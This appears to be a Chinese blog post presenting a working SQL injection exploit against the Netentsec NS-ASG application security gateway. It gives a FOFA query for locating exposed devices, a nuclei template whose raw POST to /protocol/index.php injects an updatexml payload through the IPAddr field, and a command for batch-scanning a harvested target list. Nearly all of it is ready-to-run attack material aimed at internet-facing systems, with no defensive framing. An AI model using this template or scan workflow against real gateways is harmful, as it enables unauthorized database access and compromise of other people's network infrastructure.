fofa语句:
app="网康科技-NS-ASG安全网关"
nuclei脚本:
id: wangkang-NS-ASG-index-sqli
info:
name: 网康NS-ASG应用安全网关index.php sql注入漏洞
author: fgz
severity: critical
description: Netentsec NS-ASG Application Security Gateway 6.3中发现了一个漏洞,被分类为危急级别。这影响了文件/protocol/index.php的一个未知部分。对参数IPAddr的操作导致了SQL注入。攻击者可以远程发起攻击。
metadata:
max-request: 1
fofa-query: app="网康科技-NS-ASG安全网关"
verified: true
requests:
- raw:
- |+
POST /protocol/index.php HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains((body), 'error') && contains(body,'6cfe798ba8e5b85feb50164c59f4bec')"批量验证 :
nuclei.exe -p http://127.0.0.1:8080 -stats -t wangkang-NS-ASG-index-sqli.yaml -l "F:\mybox\ScanTools\Fofa\final_wangkang.txt"
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
